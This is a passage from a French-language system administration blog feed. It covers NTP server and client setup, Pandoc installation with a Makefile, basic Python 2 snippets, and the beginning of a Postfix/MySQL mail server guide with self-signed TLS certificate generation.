<div class="highlight"><pre><span></span><code>yum install ntp ntpdate
</code></pre></div>
<p>La configuration initiale du fichier est suffisante. Il peut cependant être nécessaire de changer la liste des serveurs pour en récupérer des plus proches géographiquement.</p>
<div class="highlight"><pre><span></span><code><span class="err"># vim /etc/ntp.conf</span>
<span class="err">server 0.pool.ntp.org</span>
<span class="err">server 1.pool.ntp.org</span>
<span class="err">server 2.pool.ntp.org</span>
<span class="err">server 3.pool.ntp.org</span>
</code></pre></div>
<p>Si le pare-feu est activé, il faut également ajouter une nouvelle pour autoriser l'exposition du port UDP/123.</p>
<div class="highlight"><pre><span></span><code>firewall-cmd --zone<span class="o">=</span>public --permanent --add-service<span class="o">=</span>ntp
</code></pre></div>
<h1>Installation client</h1>
<p>Comme pour le serveur, il faut installer les paquets sur le ou les clients qui se synchroniseront sur le serveur.</p>
<div class="highlight"><pre><span></span><code>yum install ntp ntpdate
</code></pre></div>
<p>Contrairement à la configuration précédente, seul le serveur NTP de relais est nécessaire pour faire la sychronisation.</p>
<div class="highlight"><pre><span></span><code><span class="err"># vim /etc/ntp.conf</span>
<span class="err">server xxx.xxx.xxx.xxx</span>
</code></pre></div>
<h1>Status</h1>
<div class="highlight"><pre><span></span><code>> systemctl status ntpd
> ntpq -p
remote refid st t when poll reach delay offset <span class="nv">jitter</span>
<span class="o">==============================================================================</span>
+herbrand.noumic <span class="m">193</span>.190.230.66 <span class="m">2</span> u <span class="m">112</span> <span class="m">128</span> <span class="m">377</span> <span class="m">30</span>.545 -0.753 <span class="m">0</span>.353
*dedibox.demonge <span class="m">195</span>.83.222.27 <span class="m">2</span> u <span class="m">138</span> <span class="m">128</span> <span class="m">376</span> <span class="m">25</span>.881 -1.174 <span class="m">2</span>.059
+sambuca.psychon <span class="m">130</span>.149.17.21 <span class="m">2</span> u <span class="m">209</span> <span class="m">128</span> <span class="m">376</span> <span class="m">32</span>.268 -1.497 <span class="m">0</span>.513
+ddbx0.iliad.fr <span class="m">145</span>.238.203.10 <span class="m">3</span> u <span class="m">143</span> <span class="m">128</span> <span class="m">376</span> <span class="m">26</span>.047 -1.112 <span class="m">3</span>.434
</code></pre></div>
<ul>
<li>" " – No state indicated for:</li>
<li>non-communicating remote machines,</li>
<li>"LOCAL" for this local host,</li>
<li>(unutilised) high stratum servers,</li>
<li>remote machines that are themselves using this host as their synchronisation reference;</li>
<li>"x" – Out of tolerance, do not use (discarded by intersection algorithm);</li>
<li>"–" – Out of tolerance, do not use (discarded by the cluster algorithm);</li>
<li>"#" – Good remote peer or server but not utilised (not among the first six peers sorted by synchronization distance, ready as a backup source);</li>
<li>"+" – Good and a preferred remote peer or server (included by the combine algorithm);</li>
<li>"*" – The remote peer or server presently used as the primary reference;</li>
<li>"o" – PPS peer (when the prefer peer is valid). The actual system synchronization is derived from a pulse-per-second (PPS) signal, either indirectly via the PPS reference clock driver or directly via kernel interface.</li>
</ul>
<p>https://exchange.nagios.org/directory/Plugins/Network-Protocols/NTP-and-Time/check_stratum/details</p>Pandoc2018-11-24T10:20:00+01:002018-11-24T10:20:00+01:00nlegalltag:blog.nlegall.fr,2018-11-24:/pandoc.html<p><em>a universal document converter</em></p>
<h1>Introduction</h1>
<p>Pandoc can convert documents in markdown, reStructuredText, textile, HTML, DocBook, LaTeX, MediaWiki markup, TWiki markup, OPML, Emacs Org-Mode, Txt2Tags, Microsoft Word docx, LibreOffice ODT, EPUB, or Haddock markup to HTML formats, Word processor formats, Ebooks, Documentation formats, InDesign ICML, OPML, LaTeX, ConTeXt, LaTeX Beamer slides …</p><p><em>a universal document converter</em></p>
<h1>Introduction</h1>
<p>Pandoc can convert documents in markdown, reStructuredText, textile, HTML, DocBook, LaTeX, MediaWiki markup, TWiki markup, OPML, Emacs Org-Mode, Txt2Tags, Microsoft Word docx, LibreOffice ODT, EPUB, or Haddock markup to HTML formats, Word processor formats, Ebooks, Documentation formats, InDesign ICML, OPML, LaTeX, ConTeXt, LaTeX Beamer slides, PDF or Lightweight markup formats.</p>
<h1>Installation</h1>
<h2>*nix</h2>
<div class="highlight"><pre><span></span><code>apt install texlive-latex-recommended pandoc
<span class="c1"># or</span>
dnf install pandoc texlive-latex
</code></pre></div>
<h2>Windows</h2>
<p>http://miktex.org/download</p>
<p>https://github.com/jgm/pandoc/releases/latest</p>
<h1>Utilisation</h1>
<h2>Makefile</h2>
<p><em>récupérable ici : https://gist.github.com/Darkitty/258826aac448a522d1a4e5199b316405</em></p>
<p>Traite l'ensemble des fichiers en extension <code>md</code> vers des fichiers PDF avec la prise en charge de la coloration syntaxique.</p>
<div class="highlight"><pre><span></span><code><span class="c"># Produce PDFs from all Markdown files in a directory</span>
<span class="c"># List files to be made by finding all *.md files and appending .pdf</span>
<span class="nv">PDFS</span> <span class="o">:=</span> <span class="k">$(</span>patsubst %.md,%.pdf,<span class="k">$(</span>wildcard *.md<span class="k">))</span>
<span class="c"># The all rule makes all the PDF files listed</span>
<span class="nf">all </span><span class="o">:</span> <span class="k">$(</span><span class="nv">PDFS</span><span class="k">)</span>
<span class="c"># This generic rule accepts PDF targets with corresponding Markdown </span>
<span class="c"># source, and makes them using pandoc</span>
<span class="nf">%.pdf </span><span class="o">:</span> %.<span class="n">md</span>
<span class="c"> # Conversion to PDF file</span>
pandoc -V geometry:paperwidth<span class="o">=</span>21cm -V geometry:paperheight<span class="o">=</span><span class="m">29</span>.4cm -V geometry:margin<span class="o">=</span>.5cm --highlight-style tango --tos -f markdown $< -o <span class="nv">$@</span>
<span class="c"># Remove all PDF outputs</span>
<span class="nf">clean </span><span class="o">:</span>
rm <span class="k">$(</span>PDFS<span class="k">)</span>
<span class="c"># Remove all PDF outputs then build them again</span>
<span class="nf">rebuild </span><span class="o">:</span> <span class="n">clean</span> <span class="n">all</span>
</code></pre></div>
<p>pandoc --listings -H listings-setup.tex --toc -V geometry:"left=1cm, top=1cm, right=1cm, bottom=2cm" .\README.md -o .\README.pdf</p>Python2018-11-24T10:20:00+01:002018-11-24T10:20:00+01:00nlegalltag:blog.nlegall.fr,2018-11-24:/python.html<p><img alt="" src="https://img.nlegall.fr/tJnhA9ya"></p>
<p><em>Python est un langage de programmation objet, multi-paradigme et multiplateformes. Il favorise la programmation impérative structurée, fonctionnelle et orientée objet. Il est doté d'un typage dynamique fort, d'une gestion automatique de la mémoire par ramasse-miettes et d'un système de gestion d'exceptions ; il est ainsi similaire à Perl, Ruby, Scheme, Smalltalk …</em></p><p><img alt="" src="https://img.nlegall.fr/tJnhA9ya"></p>
<p><em>Python est un langage de programmation objet, multi-paradigme et multiplateformes. Il favorise la programmation impérative structurée, fonctionnelle et orientée objet. Il est doté d'un typage dynamique fort, d'une gestion automatique de la mémoire par ramasse-miettes et d'un système de gestion d'exceptions ; il est ainsi similaire à Perl, Ruby, Scheme, Smalltalk et Tcl.</em></p>
<h1>Encodage</h1>
<div class="highlight"><pre><span></span><code><span class="c1"># -*- coding: utf-8 -*-</span>
</code></pre></div>
<h1>Affichage</h1>
<h2>Caractères spéciaux</h2>
<table>
<thead>
<tr>
<th>Code</th>
<th>Equuivalent</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>\n</code></td>
<td>Retour à la ligne</td>
</tr>
<tr>
<td><code>\t</code></td>
<td>Tabulation</td>
</tr>
</tbody>
</table>
<h2>Concaténation avec variables</h2>
<div class="highlight"><pre><span></span><code><span class="o">>>></span> <span class="n">moutons</span> <span class="o">=</span> <span class="mi">42</span>
<span class="o">>>></span> <span class="nb">print</span> <span class="s2">"Il y a"</span><span class="p">,</span> <span class="n">moutons</span><span class="p">,</span> <span class="s2">"moutons."</span>
<span class="n">Il</span> <span class="n">y</span> <span class="n">a</span> <span class="mi">42</span> <span class="n">moutons</span><span class="o">.</span>
</code></pre></div>
<h2>Affichage avec formatage</h2>
<div class="highlight"><pre><span></span><code><span class="o">>>></span> <span class="n">moutons</span> <span class="o">=</span> <span class="mf">42.0</span>
<span class="c1"># Entier</span>
<span class="o">>>></span> <span class="nb">print</span> <span class="s2">"Il y a </span><span class="si">%d</span><span class="s2"> moutons."</span> <span class="o">%</span> <span class="n">moutons</span>
<span class="n">Il</span> <span class="n">y</span> <span class="n">a</span> <span class="mi">42</span> <span class="n">moutons</span><span class="o">.</span>
<span class="c1"># Flottant</span>
<span class="o">>>></span> <span class="nb">print</span> <span class="s2">"Il y a </span><span class="si">%f</span><span class="s2"> moutons."</span> <span class="o">%</span> <span class="n">moutons</span>
<span class="n">Il</span> <span class="n">y</span> <span class="n">a</span> <span class="mf">42.000000</span> <span class="n">moutons</span><span class="o">.</span>
<span class="c1"># Chaine de caractères</span>
<span class="o">>>></span> <span class="nb">print</span> <span class="s2">"Il y a </span><span class="si">%s</span><span class="s2"> moutons."</span> <span class="o">%</span> <span class="n">moutons</span>
<span class="n">Il</span> <span class="n">y</span> <span class="n">a</span> <span class="mf">42.0</span> <span class="n">moutons</span><span class="o">.</span>
</code></pre></div>
<h2>Répétition</h2>
<div class="highlight"><pre><span></span><code><span class="o">>>></span> <span class="nb">print</span> <span class="s2">"."</span> <span class="o">*</span> <span class="mi">10</span>
<span class="o">..........</span>
</code></pre></div>
<h2>Block de texte</h2>
<div class="highlight"><pre><span></span><code><span class="o">>>></span> <span class="nb">print</span> <span class="s2">"""</span>
<span class="s2">... C'est l'histoire d'un mouton</span>
<span class="s2">... qui voulait être ami avec</span>
<span class="s2">... un pinguoin.</span>
<span class="s2">... """</span>
<span class="n">C</span><span class="s1">'est l'</span><span class="n">histoire</span> <span class="n">d</span><span class="s1">'un mouton</span>
<span class="n">qui</span> <span class="n">voulait</span> <span class="n">être</span> <span class="n">ami</span> <span class="n">avec</span>
<span class="n">un</span> <span class="n">pinguoin</span><span class="o">.</span>
</code></pre></div>
<h1>Arguments</h1>
<div class="highlight"><pre><span></span><code><span class="kn">from</span> <span class="nn">sys</span> <span class="kn">import</span> <span class="n">argv</span>
<span class="n">script</span><span class="p">,</span> <span class="n">first</span><span class="p">,</span> <span class="n">second</span><span class="p">,</span> <span class="n">third</span> <span class="o">=</span> <span class="n">argv</span>
</code></pre></div>
<h1>Fichier</h1>
<h2>Lecture</h2>
<div class="highlight"><pre><span></span><code><span class="n">txt</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">filename</span><span class="p">)</span>
<span class="nb">print</span> <span class="s2">"Contenu du fichier :"</span>
<span class="nb">print</span> <span class="n">txt</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
</code></pre></div>Serveur de mail2018-11-24T10:20:00+01:002018-11-24T10:20:00+01:00nlegalltag:blog.nlegall.fr,2018-11-24:/serveur-de-mail.html<p>Pour tester votre serveur de mail, vous pouvez utiliser ce site internet : http://www.mail-tester.com. Si tout est bien configuré, vous devriez atteindre un score proche de 10.</p>
<p><em>Le serveur web utilisé ici est nginx. Vous pouvez tout à fait utiliser Apache2 ou lighttpd à condition d'adapter les configurations …</em></p><p>Pour tester votre serveur de mail, vous pouvez utiliser ce site internet : http://www.mail-tester.com. Si tout est bien configuré, vous devriez atteindre un score proche de 10.</p>
<p><em>Le serveur web utilisé ici est nginx. Vous pouvez tout à fait utiliser Apache2 ou lighttpd à condition d'adapter les configurations web.</em></p>
<p><em>Les utilisateurs et les mails étant stockés en base de données, il vous avoir un serveur MySQL/MariaDB fonctionnel sur votre serveur.</em></p>
<p>Si vous souhaitez ajouter une interface web (client webmail) au serveur de mail, vous pouvez suivre la procédure <a href="#!Roundcubemail.md">ici</a>.</p>
<p><em>domain.tld est le nom de domaine à ajouter.</em></p>
<h1>Architecture</h1>
<p><img alt="" src="https://img.nlegall.fr/zQVaeXAj"></p>
<h2>Envoie</h2>
<p><img alt="" src="https://img.nlegall.fr/cYHWFJsG"></p>
<h2>Réception</h2>
<p><img alt="" src="https://img.nlegall.fr/odxXGa5L"></p>
<h1>Postfix</h1>
<div class="highlight"><pre><span></span><code>apt-get install postfix postfix-mysql
mysql -u root -p
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="k">CREATE</span> <span class="k">database</span> <span class="k">postfix</span><span class="p">;</span>
<span class="k">CREATE</span> <span class="k">USER</span> <span class="s1">'postfix'</span><span class="o">@</span><span class="s1">'localhost'</span> <span class="n">IDENTIFIED</span> <span class="k">BY</span> <span class="s1">'MOT DE PASSE'</span><span class="p">;</span>
<span class="k">GRANT</span> <span class="k">USAGE</span> <span class="k">ON</span> <span class="o">*</span><span class="p">.</span><span class="o">*</span> <span class="k">TO</span> <span class="s1">'postfix'</span><span class="o">@</span><span class="s1">'localhost'</span><span class="p">;</span>
<span class="k">GRANT</span> <span class="k">ALL</span> <span class="k">PRIVILEGES</span> <span class="k">ON</span> <span class="k">postfix</span><span class="p">.</span><span class="o">*</span> <span class="k">TO</span> <span class="s1">'postfix'</span><span class="o">@</span><span class="s1">'localhost'</span><span class="p">;</span>
</code></pre></div>
<h2>Mappage avec MySQL</h2>
<h2>Domaines</h2>
<div class="highlight"><pre><span></span><code><span class="o">#</span> <span class="n">vim</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="k">postfix</span><span class="o">/</span><span class="n">mysql</span><span class="o">-</span><span class="n">virtual</span><span class="o">-</span><span class="n">mailbox</span><span class="o">-</span><span class="n">domains</span><span class="p">.</span><span class="n">cf</span>
<span class="n">hosts</span> <span class="o">=</span> <span class="mi">127</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">1</span>
<span class="k">user</span> <span class="o">=</span> <span class="k">postfix</span>
<span class="n">password</span> <span class="o">=</span> <span class="n">MOT</span> <span class="n">DE</span> <span class="n">PASSE</span>
<span class="n">dbname</span> <span class="o">=</span> <span class="k">postfix</span>
<span class="n">query</span> <span class="o">=</span> <span class="k">SELECT</span> <span class="k">domain</span> <span class="k">FROM</span> <span class="k">domain</span> <span class="k">WHERE</span> <span class="k">domain</span><span class="o">=</span><span class="s1">'%s'</span> <span class="k">and</span> <span class="n">backupmx</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">and</span> <span class="n">active</span> <span class="o">=</span> <span class="mi">1</span>
</code></pre></div>
<h2>Boites mail</h2>
<div class="highlight"><pre><span></span><code><span class="o">#</span> <span class="n">vim</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="k">postfix</span><span class="o">/</span><span class="n">mysql</span><span class="o">-</span><span class="n">virtual</span><span class="o">-</span><span class="n">mailbox</span><span class="o">-</span><span class="n">maps</span><span class="p">.</span><span class="n">cf</span>
<span class="n">hosts</span> <span class="o">=</span> <span class="mi">127</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">1</span>
<span class="k">user</span> <span class="o">=</span> <span class="k">postfix</span>
<span class="n">password</span> <span class="o">=</span> <span class="n">MOT</span> <span class="n">DE</span> <span class="n">PASSE</span>
<span class="n">dbname</span> <span class="o">=</span> <span class="k">postfix</span>
<span class="n">query</span> <span class="o">=</span> <span class="k">SELECT</span> <span class="n">maildir</span> <span class="k">FROM</span> <span class="n">mailbox</span> <span class="k">WHERE</span> <span class="n">username</span><span class="o">=</span><span class="s1">'%s'</span> <span class="k">AND</span> <span class="n">active</span> <span class="o">=</span> <span class="mi">1</span>
</code></pre></div>
<h2>Alias</h2>
<div class="highlight"><pre><span></span><code><span class="o">#</span> <span class="n">vim</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="k">postfix</span><span class="o">/</span><span class="n">mysql</span><span class="o">-</span><span class="n">virtual</span><span class="o">-</span><span class="k">alias</span><span class="o">-</span><span class="n">maps</span><span class="p">.</span><span class="n">cf</span>
<span class="n">hosts</span> <span class="o">=</span> <span class="mi">127</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">1</span>
<span class="k">user</span> <span class="o">=</span> <span class="k">postfix</span>
<span class="n">password</span> <span class="o">=</span> <span class="n">MOT</span> <span class="n">DE</span> <span class="n">PASSE</span>
<span class="n">dbname</span> <span class="o">=</span> <span class="k">postfix</span>
<span class="n">query</span> <span class="o">=</span> <span class="k">SELECT</span> <span class="k">goto</span> <span class="k">FROM</span> <span class="k">alias</span> <span class="k">WHERE</span> <span class="n">address</span><span class="o">=</span><span class="s1">'%s'</span> <span class="k">AND</span> <span class="n">active</span> <span class="o">=</span> <span class="mi">1</span>
</code></pre></div>
<h2>Génération SSL/TLS</h2>
<p><em>Il est possible de le faire maintenant avec Let's Encrypt.</em></p>
<p>Vous pouvez passer cette étape si vous posséder déjà le certificat et la clé pour activer le SSL/TLS sur le domaine (certificat StartSLL ou payant).</p>
<p>Des questions vous seront posées durant les lignes de commandes suivantes. Vous pouvez renseigner avec les informations que vous souhaitez (elles apparaîtront ensuite dans le certificat).</p>
<div class="highlight"><pre><span></span><code><span class="nb">cd</span> /etc/ssl/
<span class="c1"># Génération des fichiers</span>
openssl genrsa -out ca.key.pem <span class="m">4096</span>
openssl req -x509 -new -nodes -days <span class="m">1460</span> -sha256 -key ca.key.pem -out ca.cert.pem
openssl genrsa -out mailserver.key <span class="m">4096</span>
openssl req -new -sha256 -key mailserver.key -out mailserver.csr
openssl x509 -req -days <span class="m">1460</span> -sha256 -in mailserver.csr -CA ca.cert.pem -CAkey ca.key.pem -CAcreateserial -out mailserver.crt
<span class="c1"># Droits sur les fichiers</span>
chmod <span class="m">444</span> ca.cert.pem
chmod <span class="m">444</span> mailserver.crt
chmod <span class="m">400</span> ca.key.pem
chmod <span class="m">400</span> mailserver.key
<span class="c1"># Déplacement dans les dossiers</span>
mv ca.key.pem private/
mv ca.cert.pem certs/
mv mailserver.key private/
mv mailserver.crt certs/
</code></pre></div>
<h2>Fichiers de configuration</h2>
<div class="highlight"><pre><span></span><code>mv /etc/postfix/main.cf /etc/postfix/main.cf.bak
cp /etc/postfix/master.cf /etc/postfix/master.cf.bak
</code></pre></div>
<h2>/etc/postfix/main.cf</h2>
<div class="highlight"><pre><span></span><code><span class="s s-Atom">############</span>
<span class="s s-Atom">#</span> <span class="nv">GENERALS</span> <span class="nv">SETTINGS</span> <span class="s s-Atom">#</span>
<span class="s s-Atom">############</span>
<span class="s s-Atom">smtpd_banner</span> <span class="o">=</span> <span class="err">$</span><span class="s s-Atom">myhostname</span> <span class="nv">ESMTP</span> <span class="err">$</span><span class="nf">mail_name</span> <span class="p">(</span><span class="nv">Debian</span><span class="o">/</span><span class="nv">GNU</span><span class="p">)</span>
<span class="s s-Atom">biff</span> <span class="o">=</span> <span class="s s-Atom">no</span>
<span class="s s-Atom">append_dot_mydomain</span> <span class="o">=</span> <span class="s s-Atom">no</span>
<span class="s s-Atom">readme_directory</span> <span class="o">=</span> <span class="s s-Atom">no</span>
<span class="s s-Atom">delay_warning_time</span> <span class="o">=</span> <span class="mi">4</span><span class="s s-Atom">h</span>
<span class="s s-Atom">mailbox_command</span> <span class="o">=</span> <span class="s s-Atom">procmail</span> <span class="o">-</span><span class="s s-Atom">a</span> <span class="s2">"$EXTENSION"</span>
<span class="s s-Atom">recipient_delimiter</span> <span class="o">=</span> <span class="o">+</span>
<span class="s s-Atom">disable_vrfy_command</span> <span class="o">=</span> <span class="s s-Atom">yes</span>
<span class="s s-Atom">message_size_limit</span> <span class="o">=</span> <span class="mi">502400000</span>
<span class="s s-Atom">mailbox_size_limit</span> <span class="o">=</span> <span class="mi">1024000000</span>
<span class="s s-Atom">inet_interfaces</span> <span class="o">=</span> <span class="s s-Atom">all</span>
<span class="s s-Atom">inet_protocols</span> <span class="o">=</span> <span class="s s-Atom">ipv4</span>
<span class="s s-Atom">myhostname</span> <span class="o">=</span> <span class="s s-Atom">hostname</span><span class="p">.</span><span class="s s-Atom">domain</span><span class="p">.</span><span class="s s-Atom">tld</span>
<span class="s s-Atom">myorigin</span> <span class="o">=</span> <span class="s s-Atom">hostname</span><span class="p">.</span><span class="s s-Atom">domain</span><span class="p">.</span><span class="s s-Atom">tld</span>
<span class="s s-Atom">mydestination</span> <span class="o">=</span> <span class="s s-Atom">localhost</span> <span class="s s-Atom">localhost</span><span class="p">.</span><span class="err">$</span><span class="s s-Atom">mydomain</span>
<span class="s s-Atom">mynetworks</span> <span class="o">=</span> <span class="mf">127.0.0.0</span><span class="o">/</span><span class="mi">8</span> <span class="p">[</span><span class="s s-Atom">::</span><span class="nn">ffff</span><span class="p">:</span><span class="mf">127.0.0.0</span><span class="p">]</span><span class="o">/</span><span class="mi">104</span> <span class="p">[</span><span class="s s-Atom">::</span><span class="mi">1</span><span class="p">]</span><span class="o">/</span><span class="mi">128</span>
<span class="s s-Atom">relayhost</span> <span class="o">=</span>
<span class="s s-Atom">alias_maps</span> <span class="o">=</span> <span class="nn">hash</span><span class="p">:</span><span class="o">/</span><span class="s s-Atom">etc</span><span class="o">/</span><span class="s s-Atom">aliases</span>
<span class="s s-Atom">alias_database</span> <span class="o">=</span> <span class="nn">hash</span><span class="p">:</span><span class="o">/</span><span class="s s-Atom">etc</span><span class="o">/</span><span class="s s-Atom">aliases</span>
<span class="s s-Atom">##########</span>
<span class="s s-Atom">#</span> <span class="nv">TLS</span> <span class="nv">PARAMETERS</span> <span class="s s-Atom">#</span>
<span class="s s-Atom">##########</span>
<span class="s s-Atom">#</span> <span class="nv">Smtp</span> <span class="p">(</span> <span class="nv">OUTGOING</span> <span class="o">/</span> <span class="nv">Client</span> <span class="p">)</span>
<span class="s s-Atom">smtp_tls_loglevel</span> <span class="o">=</span> <span class="mi">1</span>
<span class="s s-Atom">smtp_tls_security_level</span> <span class="o">=</span> <span class="s s-Atom">may</span>
<span class="s s-Atom">smtp_tls_CAfile</span> <span class="o">=</span> <span class="o">/</span><span class="s s-Atom">etc</span><span class="o">/</span><span class="s s-Atom">ssl</span><span class="o">/</span><span class="s s-Atom">certs</span><span class="o">/</span><span class="s s-Atom">ca</span><span class="p">.</span><span class="s s-Atom">cert</span><span class="p">.</span><span class="s s-Atom">pem</span>
<span class="s s-Atom">smtp_tls_protocols</span> <span class="o">=</span> <span class="p">!</span><span class="nv">SSLv2</span><span class="p">,</span> <span class="p">!</span><span class="nv">SSLv3</span>
<span class="s s-Atom">smtp_tls_mandatory_protocols</span> <span class="o">=</span> <span class="p">!</span><span class="nv">SSLv2</span><span class="p">,</span> <span class="p">!</span><span class="nv">SSLv3</span>
<span class="s s-Atom">smtp_tls_mandatory_ciphers</span> <span class="o">=</span> <span class="s s-Atom">high</span>
<span class="s s-Atom">smtp_tls_exclude_ciphers</span> <span class="o">=</span> <span class="s s-Atom">aNULL</span><span class="p">,</span> <span class="s s-Atom">eNULL</span><span class="p">,</span> <span class="nv">EXPORT</span><span class="p">,</span> <span class="nv">DES</span><span class="p">,</span> <span class="mi">3</span><span class="nv">DES</span><span class="p">,</span> <span class="nv">RC2</span><span class="p">,</span> <span class="nv">RC4</span><span class="p">,</span> <span class="nv">MD5</span><span class="p">,</span> <span class="nv">PSK</span><span class="p">,</span> <span class="nv">SRP</span><span class="p">,</span> <span class="nv">DSS</span><span class="p">,</span> <span class="nv">AECDH</span><span class="p">,</span> <span class="nv">ADH</span>
<span class="s s-Atom">smtp_tls_note_starttls_offer</span> <span class="o">=</span> <span class="s s-Atom">yes</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">---------------------------------------------------------------------------------------------------</span>
<span class="s s-Atom">#</span> <span class="nv">Smtpd</span> <span class="p">(</span> <span class="nv">INCOMING</span> <span class="o">/</span> <span class="nv">Server</span> <span class="p">)</span>
<span class="s s-Atom">smtpd_tls_loglevel</span> <span class="o">=</span> <span class="mi">1</span>
<span class="s s-Atom">smtpd_tls_auth_only</span> <span class="o">=</span> <span class="s s-Atom">yes</span>
<span class="s s-Atom">smtpd_tls_security_level</span> <span class="o">=</span> <span class="s s-Atom">may</span>
<span class="s s-Atom">smtpd_tls_received_header</span> <span class="o">=</span> <span class="s s-Atom">yes</span>
<span class="s s-Atom">smtpd_tls_protocols</span> <span class="o">=</span> <span class="p">!</span><span class="nv">SSLv2</span><span class="p">,</span> <span class="p">!</span><span class="nv">SSLv3</span>
<span class="s s-Atom">smtpd_tls_mandatory_protocols</span> <span class="o">=</span> <span class="p">!</span><span class="nv">SSLv2</span><span class="p">,</span> <span class="p">!</span><span class="nv">SSLv3</span>
<span class="s s-Atom">smtpd_tls_mandatory_ciphers</span> <span class="o">=</span> <span class="s s-Atom">medium</span>
<span class="s s-Atom">#</span> <span class="nv">Infos</span> <span class="p">(</span><span class="s s-Atom">voir</span> <span class="s s-Atom">:</span> <span class="s s-Atom">postconf</span> <span class="o">-</span><span class="s s-Atom">d</span><span class="p">)</span>
<span class="s s-Atom">#</span> <span class="nv">Medium</span> <span class="s s-Atom">cipherlist</span> <span class="o">=</span> <span class="nf">aNULL</span><span class="o">:-</span><span class="s s-Atom">aNULL:</span><span class="nv">ALL</span><span class="s s-Atom">:</span><span class="p">!</span><span class="nv">EXPORT</span><span class="s s-Atom">:</span><span class="p">!</span><span class="nv">LOW</span><span class="s s-Atom">:+</span><span class="nv">RC4</span><span class="s s-Atom">:@</span><span class="nv">STRENGTH</span>
<span class="s s-Atom">#</span> <span class="nv">High</span> <span class="s s-Atom">cipherlist</span> <span class="o">=</span> <span class="nf">aNULL</span><span class="o">:-</span><span class="s s-Atom">aNULL:</span><span class="nv">ALL</span><span class="s s-Atom">:</span><span class="p">!</span><span class="nv">EXPORT</span><span class="s s-Atom">:</span><span class="p">!</span><span class="nv">LOW</span><span class="s s-Atom">:</span><span class="p">!</span><span class="nv">MEDIUM</span><span class="s s-Atom">:+</span><span class="nv">RC4</span><span class="s s-Atom">:@</span><span class="nv">STRENGTH</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">smtpd_tls_exclude_ciphers</span> <span class="o">=</span> <span class="nv">NE</span> <span class="nv">PAS</span> <span class="s s-Atom">modifier</span> <span class="s s-Atom">cette</span> <span class="s s-Atom">directive</span> <span class="s s-Atom">pour</span> <span class="s s-Atom">des</span> <span class="s s-Atom">raisons</span> <span class="s s-Atom">de</span> <span class="s s-Atom">compatibilité</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">avec</span> <span class="s s-Atom">les</span> <span class="s s-Atom">autres</span> <span class="s s-Atom">serveurs</span> <span class="s s-Atom">de</span> <span class="s s-Atom">mail</span> <span class="s s-Atom">afin</span> <span class="s s-Atom">d</span><span class="err">'</span><span class="s s-Atom">éviter</span> <span class="s s-Atom">une</span> <span class="s s-Atom">erreur</span> <span class="s s-Atom">du</span> <span class="s s-Atom">type</span>
<span class="s s-Atom">#</span> <span class="s2">"no shared cipher"</span> <span class="s s-Atom">ou</span> <span class="s2">"no cipher overlap"</span> <span class="s s-Atom">puis</span> <span class="s s-Atom">un</span> <span class="s s-Atom">fallback</span> <span class="s s-Atom">en</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">plain</span><span class="o">/</span><span class="s s-Atom">text</span><span class="p">...</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">smtpd_tls_cipherlist</span> <span class="o">=</span> <span class="nv">Ne</span> <span class="s s-Atom">pas</span> <span class="s s-Atom">modifier</span> <span class="s s-Atom">non</span> <span class="s s-Atom">plus</span> <span class="p">!</span>
<span class="s s-Atom">smtpd_tls_CAfile</span> <span class="o">=</span> <span class="err">$</span><span class="s s-Atom">smtp_tls_CAfile</span>
<span class="s s-Atom">smtpd_tls_cert_file</span> <span class="o">=</span> <span class="o">/</span><span class="s s-Atom">etc</span><span class="o">/</span><span class="s s-Atom">ssl</span><span class="o">/</span><span class="s s-Atom">certs</span><span class="o">/</span><span class="s s-Atom">mailserver</span><span class="p">.</span><span class="s s-Atom">crt</span>
<span class="s s-Atom">smtpd_tls_key_file</span> <span class="o">=</span> <span class="o">/</span><span class="s s-Atom">etc</span><span class="o">/</span><span class="s s-Atom">ssl</span><span class="o">/</span><span class="s s-Atom">private</span><span class="o">/</span><span class="s s-Atom">mailserver</span><span class="p">.</span><span class="s s-Atom">key</span>
<span class="s s-Atom">smtpd_tls_dh1024_param_file</span> <span class="o">=</span> <span class="err">$</span><span class="s s-Atom">config_directory</span><span class="o">/</span><span class="s s-Atom">dh2048</span><span class="p">.</span><span class="s s-Atom">pem</span>
<span class="s s-Atom">smtpd_tls_dh512_param_file</span> <span class="o">=</span> <span class="err">$</span><span class="s s-Atom">config_directory</span><span class="o">/</span><span class="s s-Atom">dh512</span><span class="p">.</span><span class="s s-Atom">pem</span>
<span class="s s-Atom">tls_preempt_cipherlist</span> <span class="o">=</span> <span class="s s-Atom">yes</span>
<span class="s s-Atom">tls_random_source</span> <span class="o">=</span> <span class="nn">dev</span><span class="p">:</span><span class="o">/</span><span class="s s-Atom">dev</span><span class="o">/</span><span class="s s-Atom">urandom</span>
<span class="s s-Atom">smtp_tls_session_cache_database</span> <span class="o">=</span> <span class="nn">btree</span><span class="p">:</span><span class="err">$</span><span class="p">{</span><span class="s s-Atom">data_directory</span><span class="p">}</span><span class="o">/</span><span class="s s-Atom">smtp_scache</span>
<span class="s s-Atom">smtpd_tls_session_cache_database</span> <span class="o">=</span> <span class="nn">btree</span><span class="p">:</span><span class="err">$</span><span class="p">{</span><span class="s s-Atom">data_directory</span><span class="p">}</span><span class="o">/</span><span class="s s-Atom">smtpd_scache</span>
<span class="s s-Atom">lmtp_tls_session_cache_database</span> <span class="o">=</span> <span class="nn">btree</span><span class="p">:</span><span class="err">$</span><span class="p">{</span><span class="s s-Atom">data_directory</span><span class="p">}</span><span class="o">/</span><span class="s s-Atom">lmtp_scache</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">----------------------------------------------------------------------</span>
<span class="s s-Atom">###########</span>
